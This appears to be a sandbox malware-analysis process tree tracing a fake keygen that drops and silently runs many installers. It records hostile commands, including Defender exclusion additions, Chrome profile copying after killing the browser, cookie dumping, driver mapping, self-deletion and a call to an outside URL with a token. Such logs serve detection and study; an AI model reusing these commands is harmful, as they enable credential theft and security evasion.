"C:\Users\Admin\AppData\Local\Temp\is-805QU.tmp\Setup.tmp" /SL5="$20B4A,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-NCF50.tmp\Setup.exe" /Verysilent
9⤵
PID:9520

C:\Users\Admin\AppData\Local\Temp\o4jxv1cf5bi\chashepro3.exe
"C:\Users\Admin\AppData\Local\Temp\o4jxv1cf5bi\chashepro3.exe" /VERYSILENT
6⤵
PID:4308

C:\Users\Admin\AppData\Local\Temp\is-I6DBF.tmp\chashepro3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-I6DBF.tmp\chashepro3.tmp" /SL5="$10AF0,2012497,58368,C:\Users\Admin\AppData\Local\Temp\o4jxv1cf5bi\chashepro3.exe" /VERYSILENT
7⤵
PID:8328

C:\Users\Admin\AppData\Local\Temp\5soztbbmthp\gp0d1vblzfo.exe
"C:\Users\Admin\AppData\Local\Temp\5soztbbmthp\gp0d1vblzfo.exe" /ustwo INSTALL
6⤵
PID:4204

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "gp0d1vblzfo.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\5soztbbmthp\gp0d1vblzfo.exe" & exit
7⤵
PID:5344

C:\Users\Admin\AppData\Local\Temp\1bg0m5n0ekb\app.exe
"C:\Users\Admin\AppData\Local\Temp\1bg0m5n0ekb\app.exe" /8-23
6⤵
PID:3020

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Winter-Hill"
7⤵
PID:8472

C:\Program Files (x86)\Winter-Hill\7za.exe
"C:\Program Files (x86)\Winter-Hill\7za.exe" e -p154.61.71.13 winamp-plugins.7z
7⤵
PID:2144

C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"
2⤵
PID:7896

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
3⤵
PID:7244

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
4⤵
- Kills process with taskkill
PID:7688

C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"
2⤵
PID:7112

C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"
2⤵
PID:8704

C:\ProgramData\8544104.93
"C:\ProgramData\8544104.93"
3⤵
PID:9528

C:\ProgramData\6101768.67
"C:\ProgramData\6101768.67"
3⤵
PID:9700

C:\ProgramData\6258932.68
"C:\ProgramData\6258932.68"
3⤵
PID:9756

C:\ProgramData\5817141.63
"C:\ProgramData\5817141.63"
3⤵
PID:9492

C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"
2⤵
PID:9892

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
PID:8220

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
PID:7704

C:\Users\Admin\Desktop\keygen-step-4.exe
"C:\Users\Admin\Desktop\keygen-step-4.exe"
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4292

C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
2⤵
- Executes dropped EXE
PID:4808

C:\Users\Admin\AppData\Roaming\A64E.tmp.exe
"C:\Users\Admin\AppData\Roaming\A64E.tmp.exe"
3⤵
PID:6896

C:\Users\Admin\AppData\Roaming\A64E.tmp.exe
"C:\Users\Admin\AppData\Roaming\A64E.tmp.exe"
4⤵
PID:3660

C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"
2⤵
PID:6908

C:\Windows\SysWOW64\msiexec.exe
msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
3⤵
PID:192

C:\Windows\SysWOW64\cmd.exe
cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"
3⤵
PID:4964

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
4⤵
- Runs ping.exe
PID:7572

C:\Users\Admin\AppData\Local\Temp\RarSFX1\Install.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Install.exe"
2⤵
PID:6256

C:\Users\Admin\AppData\Local\Temp\8HR7CNTAN8\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\8HR7CNTAN8\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
3⤵
PID:7128

C:\Users\Admin\AppData\Local\Temp\8HR7CNTAN8\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\8HR7CNTAN8\multitimer.exe" 1 3.1615039364.60438b843920f 101
4⤵
PID:7928

C:\Users\Admin\AppData\Local\Temp\8HR7CNTAN8\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\8HR7CNTAN8\multitimer.exe" 2 3.1615039364.60438b843920f
5⤵
PID:5680

C:\Users\Admin\AppData\Local\Temp\wuu2oi3m5lo\askinstall24.exe
"C:\Users\Admin\AppData\Local\Temp\wuu2oi3m5lo\askinstall24.exe"
6⤵
PID:7176

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
7⤵
PID:8996

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
8⤵
- Kills process with taskkill
PID:8724

C:\Users\Admin\AppData\Local\Temp\1m2r1bxrjwq\iczn300qljq.exe
"C:\Users\Admin\AppData\Local\Temp\1m2r1bxrjwq\iczn300qljq.exe" /ustwo INSTALL
6⤵
PID:8864

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "iczn300qljq.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\1m2r1bxrjwq\iczn300qljq.exe" & exit
7⤵
PID:7724

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "iczn300qljq.exe" /f
8⤵
- Kills process with taskkill
PID:4396

C:\Users\Admin\AppData\Local\Temp\nx5rhpmsa20\safebits.exe
"C:\Users\Admin\AppData\Local\Temp\nx5rhpmsa20\safebits.exe" /S /pubid=1 /subid=451
6⤵
PID:8884

C:\Users\Admin\AppData\Local\Temp\xhremils3hf\vpn.exe
"C:\Users\Admin\AppData\Local\Temp\xhremils3hf\vpn.exe" /silent /subid=482
6⤵
PID:9060

C:\Users\Admin\AppData\Local\Temp\is-LUNP2.tmp\vpn.tmp
"C:\Users\Admin\AppData\Local\Temp\is-LUNP2.tmp\vpn.tmp" /SL5="$207EA,15170975,270336,C:\Users\Admin\AppData\Local\Temp\xhremils3hf\vpn.exe" /silent /subid=482
7⤵
PID:9200

C:\Users\Admin\AppData\Local\Temp\wfev3ht2euv\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\wfev3ht2euv\Setup3310.exe" /Verysilent /subid=577
6⤵
PID:8580

C:\Users\Admin\AppData\Local\Temp\is-M5J05.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-M5J05.tmp\Setup3310.tmp" /SL5="$20808,802346,56832,C:\Users\Admin\AppData\Local\Temp\wfev3ht2euv\Setup3310.exe" /Verysilent /subid=577
7⤵
PID:8840

C:\Users\Admin\AppData\Local\Temp\is-TG5I7.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-TG5I7.tmp\Setup.exe" /Verysilent
8⤵
PID:9944

C:\Users\Admin\AppData\Local\Temp\is-NBK5M.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-NBK5M.tmp\Setup.tmp" /SL5="$4053C,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-TG5I7.tmp\Setup.exe" /Verysilent
9⤵
PID:10200

C:\Users\Admin\AppData\Local\Temp\is-H8QSJ.tmp\ProPlugin.exe
"C:\Users\Admin\AppData\Local\Temp\is-H8QSJ.tmp\ProPlugin.exe" /Verysilent
10⤵
PID:8836

C:\Users\Admin\AppData\Local\Temp\is-N0PMF.tmp\ProPlugin.tmp
"C:\Users\Admin\AppData\Local\Temp\is-N0PMF.tmp\ProPlugin.tmp" /SL5="$40890,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-H8QSJ.tmp\ProPlugin.exe" /Verysilent
11⤵
PID:4260

C:\Users\Admin\AppData\Local\Temp\is-VCKP0.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-VCKP0.tmp\Setup.exe"
12⤵
PID:5464

C:\Users\Admin\AppData\Local\Temp\RarSFX4\main.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX4\main.exe"
13⤵
PID:9888

C:\Users\Admin\AppData\Local\Temp\is-H8QSJ.tmp\PictureLAb.exe
"C:\Users\Admin\AppData\Local\Temp\is-H8QSJ.tmp\PictureLAb.exe" /Verysilent
10⤵
PID:9184

C:\Users\Admin\AppData\Local\Temp\is-3HHN5.tmp\PictureLAb.tmp
"C:\Users\Admin\AppData\Local\Temp\is-3HHN5.tmp\PictureLAb.tmp" /SL5="$50890,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-H8QSJ.tmp\PictureLAb.exe" /Verysilent
11⤵
PID:7080

C:\Users\Admin\AppData\Local\Temp\is-23R6U.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-23R6U.tmp\Setup.exe" /VERYSILENT
12⤵
PID:9928

C:\Users\Admin\AppData\Local\Temp\is-086HM.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-086HM.tmp\Setup.tmp" /SL5="$80586,442598,358912,C:\Users\Admin\AppData\Local\Temp\is-23R6U.tmp\Setup.exe" /VERYSILENT
13⤵
PID:7144

C:\Users\Admin\AppData\Local\Temp\is-E8NUD.tmp\kkkk.exe
"C:\Users\Admin\AppData\Local\Temp\is-E8NUD.tmp\kkkk.exe" /S /UID=lab214
14⤵
PID:7632

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
dw20.exe -x -s 1284
15⤵
PID:9376

C:\Users\Admin\AppData\Local\Temp\is-H8QSJ.tmp\Delta.exe
"C:\Users\Admin\AppData\Local\Temp\is-H8QSJ.tmp\Delta.exe" /Verysilent
10⤵
PID:4244

C:\Users\Admin\AppData\Local\Temp\is-NGNQ1.tmp\Delta.tmp
"C:\Users\Admin\AppData\Local\Temp\is-NGNQ1.tmp\Delta.tmp" /SL5="$60890,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-H8QSJ.tmp\Delta.exe" /Verysilent
11⤵
PID:9548

C:\Users\Admin\AppData\Local\Temp\is-3LPL8.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-3LPL8.tmp\Setup.exe" /VERYSILENT
12⤵
PID:4220

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-3LPL8.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit
13⤵
PID:7980

C:\Windows\SysWOW64\taskkill.exe
taskkill /im Setup.exe /f
14⤵
- Kills process with taskkill
PID:10004

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
14⤵
- Delays execution with timeout.exe
PID:1872

C:\Users\Admin\AppData\Local\Temp\is-H8QSJ.tmp\zznote.exe
"C:\Users\Admin\AppData\Local\Temp\is-H8QSJ.tmp\zznote.exe" /Verysilent
10⤵
PID:9424

C:\Users\Admin\AppData\Local\Temp\is-ERNHD.tmp\zznote.tmp
"C:\Users\Admin\AppData\Local\Temp\is-ERNHD.tmp\zznote.tmp" /SL5="$707F4,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-H8QSJ.tmp\zznote.exe" /Verysilent
11⤵
PID:6952

C:\Users\Admin\AppData\Local\Temp\is-PNB4F.tmp\jg4_4jaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-PNB4F.tmp\jg4_4jaa.exe" /silent
12⤵
PID:7452

C:\Users\Admin\AppData\Local\Temp\is-H8QSJ.tmp\hjjgaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-H8QSJ.tmp\hjjgaa.exe" /Verysilent
10⤵
PID:10100

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
11⤵
PID:7720

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
11⤵
PID:2000

C:\Users\Admin\AppData\Local\Temp\li4ml4n4r15\chashepro3.exe
"C:\Users\Admin\AppData\Local\Temp\li4ml4n4r15\chashepro3.exe" /VERYSILENT
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:4508

C:\Users\Admin\AppData\Local\Temp\is-B6ELB.tmp\chashepro3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-B6ELB.tmp\chashepro3.tmp" /SL5="$20818,2012497,58368,C:\Users\Admin\AppData\Local\Temp\li4ml4n4r15\chashepro3.exe" /VERYSILENT
7⤵
PID:8844

C:\Users\Admin\AppData\Local\Temp\chxmr5iqqgs\vict.exe
"C:\Users\Admin\AppData\Local\Temp\chxmr5iqqgs\vict.exe" /VERYSILENT /id=535
6⤵
PID:8572

C:\Users\Admin\AppData\Local\Temp\is-M2NMU.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-M2NMU.tmp\vict.tmp" /SL5="$207F2,870426,780800,C:\Users\Admin\AppData\Local\Temp\chxmr5iqqgs\vict.exe" /VERYSILENT /id=535
7⤵
PID:2800

C:\Users\Admin\AppData\Local\Temp\is-BVMP9.tmp\wimapi.exe
"C:\Users\Admin\AppData\Local\Temp\is-BVMP9.tmp\wimapi.exe" 535
8⤵
PID:8248

C:\Users\Admin\AppData\Local\Temp\f5mcy103o5i\app.exe
"C:\Users\Admin\AppData\Local\Temp\f5mcy103o5i\app.exe" /8-23
6⤵
PID:9152

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Wispy-Haze"
7⤵
PID:4136

C:\Program Files (x86)\Wispy-Haze\7za.exe
"C:\Program Files (x86)\Wispy-Haze\7za.exe" e -p154.61.71.13 winamp-plugins.7z
7⤵
PID:8688

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Wispy-Haze\app.exe" -map "C:\Program Files (x86)\Wispy-Haze\WinmonProcessMonitor.sys""
7⤵
PID:6520

C:\Program Files (x86)\Wispy-Haze\app.exe
"C:\Program Files (x86)\Wispy-Haze\app.exe" -map "C:\Program Files (x86)\Wispy-Haze\WinmonProcessMonitor.sys"
8⤵
PID:7540

C:\Program Files (x86)\Wispy-Haze\7za.exe
"C:\Program Files (x86)\Wispy-Haze\7za.exe" e -p154.61.71.13 winamp.7z
7⤵
PID:7044

C:\Program Files (x86)\Wispy-Haze\app.exe
"C:\Program Files (x86)\Wispy-Haze\app.exe" /8-23
7⤵
PID:7760

C:\Users\Admin\AppData\Local\Temp\eqoq1mcft5y\askinstall24.exe
"C:\Users\Admin\AppData\Local\Temp\eqoq1mcft5y\askinstall24.exe"
6⤵
PID:8668

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
7⤵
PID:10852

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
8⤵
- Kills process with taskkill
PID:9412

C:\Windows\SysWOW64\xcopy.exe
xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y
7⤵
PID:10248

C:\Users\Admin\AppData\Local\Temp\hi1h0z2cdyf\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\hi1h0z2cdyf\Setup3310.exe" /Verysilent /subid=577
6⤵
PID:8608

C:\Users\Admin\AppData\Local\Temp\is-6V82R.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-6V82R.tmp\Setup3310.tmp" /SL5="$20B2E,802346,56832,C:\Users\Admin\AppData\Local\Temp\hi1h0z2cdyf\Setup3310.exe" /Verysilent /subid=577
7⤵
PID:10664

C:\Users\Admin\AppData\Local\Temp\is-3DOAD.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-3DOAD.tmp\Setup.exe" /Verysilent
8⤵
PID:8040

C:\Users\Admin\AppData\Local\Temp\is-07VS6.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-07VS6.tmp\Setup.tmp" /SL5="$60CCC,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-3DOAD.tmp\Setup.exe" /Verysilent
9⤵
PID:2664

C:\Users\Admin\AppData\Local\Temp\neefazj5e5k\safebits.exe
"C:\Users\Admin\AppData\Local\Temp\neefazj5e5k\safebits.exe" /S /pubid=1 /subid=451
6⤵
PID:10812

C:\Users\Admin\AppData\Local\Temp\kfvxmoflabc\tmr3qvxetiq.exe
"C:\Users\Admin\AppData\Local\Temp\kfvxmoflabc\tmr3qvxetiq.exe" /ustwo INSTALL
6⤵
PID:7840

C:\Users\Admin\AppData\Local\Temp\xj25ydvsi33\vict.exe
"C:\Users\Admin\AppData\Local\Temp\xj25ydvsi33\vict.exe" /VERYSILENT /id=535
6⤵
PID:3604

C:\Users\Admin\AppData\Local\Temp\is-PO5HT.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-PO5HT.tmp\vict.tmp" /SL5="$10C4A,870426,780800,C:\Users\Admin\AppData\Local\Temp\xj25ydvsi33\vict.exe" /VERYSILENT /id=535
7⤵
PID:3476

C:\Users\Admin\AppData\Local\Temp\is-161LC.tmp\wimapi.exe
"C:\Users\Admin\AppData\Local\Temp\is-161LC.tmp\wimapi.exe" 535
8⤵
PID:3016

C:\Users\Admin\AppData\Local\Temp\zxtfangodih\chashepro3.exe
"C:\Users\Admin\AppData\Local\Temp\zxtfangodih\chashepro3.exe" /VERYSILENT
6⤵
PID:11132

C:\Users\Admin\AppData\Local\Temp\is-NGQ7B.tmp\chashepro3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-NGQ7B.tmp\chashepro3.tmp" /SL5="$10C48,2012497,58368,C:\Users\Admin\AppData\Local\Temp\zxtfangodih\chashepro3.exe" /VERYSILENT
7⤵
PID:10920

C:\Users\Admin\AppData\Local\Temp\q4gl0huetib\app.exe
"C:\Users\Admin\AppData\Local\Temp\q4gl0huetib\app.exe" /8-23
6⤵
PID:9988

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Proud-Violet"
7⤵
PID:5396

C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"
2⤵
PID:6268

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
3⤵
PID:6008

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
4⤵
- Kills process with taskkill
PID:3164

C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"
2⤵
PID:4104

C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"
2⤵
PID:8252

C:\ProgramData\8857728.97
"C:\ProgramData\8857728.97"
3⤵
PID:9472

C:\ProgramData\8073317.88
"C:\ProgramData\8073317.88"
3⤵
PID:9484

C:\ProgramData\1589417.17
"C:\ProgramData\1589417.17"
3⤵
PID:9676

C:\ProgramData\5130492.56
"C:\ProgramData\5130492.56"
3⤵
PID:9620

C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"
2⤵
PID:9856

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
PID:3124

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
PID:5772

C:\Users\Admin\Desktop\keygen-step-1.exe
"C:\Users\Admin\Desktop\keygen-step-1.exe"
1⤵
- Executes dropped EXE
PID:4384

C:\Users\Admin\Desktop\keygen-step-1.exe
"C:\Users\Admin\Desktop\keygen-step-1.exe"
1⤵
- Executes dropped EXE
PID:4372

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\4ab2bba0b9fd4ddbb14d51521c87e76d /t 2880 /p 2876
1⤵
PID:4360

C:\Users\Admin\Desktop\keygen-step-4.exe
"C:\Users\Admin\Desktop\keygen-step-4.exe"
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4284

C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe"
2⤵
- Executes dropped EXE
PID:4724

C:\Users\Admin\AppData\Roaming\A0C0.tmp.exe
"C:\Users\Admin\AppData\Roaming\A0C0.tmp.exe"
3⤵
PID:2940

C:\Users\Admin\AppData\Roaming\A0C0.tmp.exe
"C:\Users\Admin\AppData\Roaming\A0C0.tmp.exe"
4⤵
PID:4404

C:\Users\Admin\Desktop\askinstall20.exe
"C:\Users\Admin\Desktop\askinstall20.exe"
1⤵
- Executes dropped EXE
PID:4256

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
2⤵
PID:4804

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
3⤵
- Kills process with taskkill
PID:1684

C:\Users\Admin\Desktop\keygen-step-1.exe
"C:\Users\Admin\Desktop\keygen-step-1.exe"
1⤵
- Executes dropped EXE
PID:4476

C:\Users\Admin\Desktop\Install.exe
"C:\Users\Admin\Desktop\Install.exe"
1⤵
PID:4536

C:\Windows\explorer.exe
explorer.exe
1⤵
- Enumerates connected drives
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4576

C:\Users\Admin\Desktop\Install.exe
"C:\Users\Admin\Desktop\Install.exe"
1⤵
PID:4528

C:\Users\Admin\Desktop\Install.exe
"C:\Users\Admin\Desktop\Install.exe"
1⤵
- Executes dropped EXE
PID:4508

C:\Users\Admin\AppData\Local\Temp\47ARTXYZ5V\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\47ARTXYZ5V\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
2⤵
PID:3556

C:\Users\Admin\AppData\Local\Temp\47ARTXYZ5V\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\47ARTXYZ5V\multitimer.exe" 1 3.1615039251.60438b13b9df7 101
3⤵
PID:6836

C:\Users\Admin\AppData\Local\Temp\47ARTXYZ5V\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\47ARTXYZ5V\multitimer.exe" 2 3.1615039251.60438b13b9df7
4⤵
PID:6996

C:\Users\Admin\AppData\Local\Temp\usqhwhvux4p\5gleb4tcpe3.exe
"C:\Users\Admin\AppData\Local\Temp\usqhwhvux4p\5gleb4tcpe3.exe" /ustwo INSTALL
5⤵
PID:4164

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "5gleb4tcpe3.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\usqhwhvux4p\5gleb4tcpe3.exe" & exit
6⤵
PID:5032

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "5gleb4tcpe3.exe" /f
7⤵
- Kills process with taskkill
PID:6272

C:\Users\Admin\AppData\Local\Temp\mkvvvdee1mk\askinstall24.exe
"C:\Users\Admin\AppData\Local\Temp\mkvvvdee1mk\askinstall24.exe"
5⤵
PID:4668

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
6⤵
PID:6880

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
7⤵
- Kills process with taskkill
PID:5896

C:\Users\Admin\AppData\Local\Temp\j4zkaaudot1\IBInstaller_97039.exe
"C:\Users\Admin\AppData\Local\Temp\j4zkaaudot1\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
5⤵
PID:4152

C:\Users\Admin\AppData\Local\Temp\is-KQNPO.tmp\IBInstaller_97039.tmp
"C:\Users\Admin\AppData\Local\Temp\is-KQNPO.tmp\IBInstaller_97039.tmp" /SL5="$602EE,14452723,721408,C:\Users\Admin\AppData\Local\Temp\j4zkaaudot1\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
6⤵
PID:3896

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c start http://gemstrue.shop/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039
7⤵
PID:6428

C:\Users\Admin\AppData\Local\Temp\is-LK03P.tmp\{app}\chrome_proxy.exe
"C:\Users\Admin\AppData\Local\Temp\is-LK03P.tmp\{app}\chrome_proxy.exe"
7⤵
PID:2236

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-LK03P.tmp\{app}\chrome_proxy.exe"
8⤵
PID:4552

C:\Windows\SysWOW64\PING.EXE
ping localhost -n 4
9⤵
- Runs ping.exe
PID:6764

C:\Users\Admin\AppData\Local\Temp\sb0qk1tep31\app.exe
"C:\Users\Admin\AppData\Local\Temp\sb0qk1tep31\app.exe" /8-23
5⤵
PID:4688

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Divine-Darkness"
6⤵
PID:6884

C:\Program Files (x86)\Divine-Darkness\7za.exe
"C:\Program Files (x86)\Divine-Darkness\7za.exe" e -p154.61.71.13 winamp-plugins.7z
6⤵
PID:1008

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Divine-Darkness\app.exe" -map "C:\Program Files (x86)\Divine-Darkness\WinmonProcessMonitor.sys""
6⤵
PID:7664

C:\Program Files (x86)\Divine-Darkness\app.exe
"C:\Program Files (x86)\Divine-Darkness\app.exe" -map "C:\Program Files (x86)\Divine-Darkness\WinmonProcessMonitor.sys"
7⤵
PID:7324

C:\Program Files (x86)\Divine-Darkness\7za.exe
"C:\Program Files (x86)\Divine-Darkness\7za.exe" e -p154.61.71.13 winamp.7z
6⤵
PID:8524

C:\Program Files (x86)\Divine-Darkness\app.exe
"C:\Program Files (x86)\Divine-Darkness\app.exe" /8-23
6⤵
PID:2312

C:\Users\Admin\AppData\Local\Temp\44qgkqw51gy\safebits.exe
"C:\Users\Admin\AppData\Local\Temp\44qgkqw51gy\safebits.exe" /S /pubid=1 /subid=451
5⤵
PID:3784

C:\Users\Admin\AppData\Local\Temp\qnx0brrahro\vict.exe
"C:\Users\Admin\AppData\Local\Temp\qnx0brrahro\vict.exe" /VERYSILENT /id=535
5⤵
PID:488

C:\Users\Admin\AppData\Local\Temp\is-BA13U.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-BA13U.tmp\vict.tmp" /SL5="$103E2,870426,780800,C:\Users\Admin\AppData\Local\Temp\qnx0brrahro\vict.exe" /VERYSILENT /id=535
6⤵
PID:3224

C:\Users\Admin\AppData\Local\Temp\is-VK5G0.tmp\wimapi.exe
"C:\Users\Admin\AppData\Local\Temp\is-VK5G0.tmp\wimapi.exe" 535
7⤵
PID:4696

C:\Users\Admin\AppData\Local\Temp\Z9HxagfFH.exe
"C:\Users\Admin\AppData\Local\Temp\Z9HxagfFH.exe"
8⤵
PID:5248

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5248 -s 1632
9⤵
- Program crash
PID:8936

C:\Windows\SysWOW64\cmd.exe
